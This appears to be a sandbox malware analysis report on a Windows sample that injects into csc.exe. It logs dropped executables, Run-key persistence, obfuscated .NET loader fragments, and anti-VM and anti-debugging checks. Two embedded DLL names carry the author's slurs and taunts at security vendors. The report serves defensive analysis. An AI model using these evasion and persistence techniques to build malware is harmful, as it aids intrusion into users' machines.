Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: icmp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: crowdstrikeceoisextragay.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: sentinelisabadedrtrynexttimemaybe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

.NET source code contains method to dynamically call methods (often used by packers)

Source: pPLwX9wSrD.exe

Static file information: File size 10485760 > 1048576

Source: pPLwX9wSrD.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x219c00

Source: pPLwX9wSrD.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdb source: pPLwX9wSrD.exe
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3258013197.000000000A390000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007918000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008D23000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3255208484.00000000071E0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.000000000894C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3258013197.000000000A390000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007918000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008D23000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdbP2N source: pPLwX9wSrD.exe
Source:	Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3255208484.00000000071E0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.000000000894C000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.pPLwX9wSrD.exe.cd0000.1.raw.unpack, ResponderElement.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.3.csc.exe.894ece8.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	.Net Code: Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777250)),Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777305))})

.NET source code contains potential unpacker

Source: 0.2.pPLwX9wSrD.exe.cd0000.1.raw.unpack, MapAnalyzer.cs	.Net Code: IncludeMap System.Reflection.Assembly.Load(byte[])
Source: 3.2.csc.exe.9dc0000.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 3.2.csc.exe.9dc0000.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 3.2.csc.exe.9dc0000.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 3.2.csc.exe.9dc0000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 3.2.csc.exe.9dc0000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 3.2.csc.exe.9d60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.csc.exe.88d6ca8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3257754381.0000000009D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3257338856.0000000008852000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3256041816.00000000076B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csc.exe PID: 7716, type: MEMORYSTR

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"			Jump to behavior

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_0047F5D0 push eax; ret	0_2_0047F5E4
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_0047F5D0 push eax; ret	0_2_0047F60C
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00484767 push ecx; ret	0_2_00484777
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00483E84 push eax; ret	0_2_00483EA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0746CF0A push eax; ret	3_2_0746CFF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0746CECE push ds; retf	3_2_0746CF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0746068B push 8B000001h; iretd	3_2_07460690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0746BACF push cs; retf	3_2_0746BAD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07461801 pushfd ; retf	3_2_0746180D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747D606 push esi; retf	3_2_0747D5E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747D606 pushad ; retf	3_2_0747D639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747D63D pushad ; retf	3_2_0747D639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747D5E2 push esi; retf	3_2_0747D5E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07470158 pushad ; iretd	3_2_07470159

Source: 3.3.csc.exe.894ece8.0.raw.unpack, nVJXBHQlPK5MbsS3eA3.cs	High entropy of concatenated method names: 'BBcQRftNqD', 'd2TQqB3jnD', 'jnkQxcPWSg', 'C8qQ68cUX4', 'HmGQBW2KGL', 'laMQMe27VV', 'ho4Q5k8pLU', 'q2SQG9KEgk', 'TYpQhxCh2I', 'y4YQP4BKHw'
Source: 3.3.csc.exe.894ece8.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	High entropy of concatenated method names: 'OfbSv8rvP8IwIGTU9i5', 'OnVoiRrcqCKf9Oa5MKD', 'wCYQpIFDtr', 'vh0ry9Sq2v', 'knSQNj5fu2', 'hDnQXpIt5a', 's6NQQGkJ2u', 'uL3QCnlUTe', 'zAksN7Kboq', 'nEuN7jDDgS'
Source: 3.3.csc.exe.894ece8.0.raw.unpack, h5gmjUDfwmEIIaJIRm.cs	High entropy of concatenated method names: 'qJXkK5FGP', 'y5n3tVyRy', 'mpsWotT5h', 'Q151kS8re', 'C5oHI4ky5', 'FE4TwCkUE', 'RsKB315Ts', 'Y3UjapZQ9', 'cTvE9yeC7', 'JuXRGSDIb'
Source: 3.3.csc.exe.894ece8.0.raw.unpack, mD3UqCQfvhthrqY1XLA.cs	High entropy of concatenated method names: 'kZVmBcn3nH', 'c6mmMubrE1', 'rLcm5NIp7U', 'Cs1mG384O5', 'd5amh5XGlj', 'XjOmPwBtBp', 'y0amf6i8QU', 'L2LCL2ZT7K', 'qXwmUSxH1y', 'dCEm4raWXl'

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	File created: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	File created: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea			Jump to behavior

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI	Jump to behavior
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea	Jump to behavior

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00412630 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,		0_2_00412630
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00478ECF IsIconic,GetWindowPlacement,GetWindowRect,		0_2_00478ECF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: csc.exe PID: 7716, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 5770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 76B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 58D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 342000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 544656	Jump to behavior

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Dropped PE file which has not been started: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Dropped PE file which has not been started: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe			Jump to dropped file

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

API coverage: 0.1 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7764	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7764	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 744	Thread sleep count: 199 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7720	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7764	Thread sleep time: -544656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe TID: 8104	Thread sleep count: 155 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe TID: 8104	Thread sleep time: -77500s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_0045E300 GetSystemTimeAsFileTime,GetModuleFileNameA,lstrcpyA,GetUserNameA,lstrcpyA,GetSystemInfo,GlobalMemoryStatus,

0_2_0045E300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 342000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 544656	Jump to behavior

Source: csc.exe, 00000003.00000003.1794277108.0000000008D23000.00000004.00000800.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000002.2057015971.000000000F520000.00000004.00001000.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000000.1792904857.0000000000401000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.4.dr	Binary or memory string: /COMPAQEMU
Source: dzocgvabs.exe, 00000007.00000003.2493856126.0000000009DA1000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: csc.exe, 00000003.00000002.3257664529.0000000009BF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe

System information queried: CodeIntegrityInformation

Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe

System information queried: KernelDebuggerInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 3_2_07472B32 LdrInitializeThunk,

3_2_07472B32

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_0045ECD0 EnterCriticalSection,IsDebuggerPresent,DebugBreak,GetLocalTime,CreateFileA,LeaveCriticalSection,SetFilePointer,GetCurrentThreadId,GetCurrentThreadId,WriteFile,WriteFile,WriteFile,CloseHandle,LeaveCriticalSection,

0_2_0045ECD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Memory allocated: page read and write | page guard

Allocates memory in foreign processes

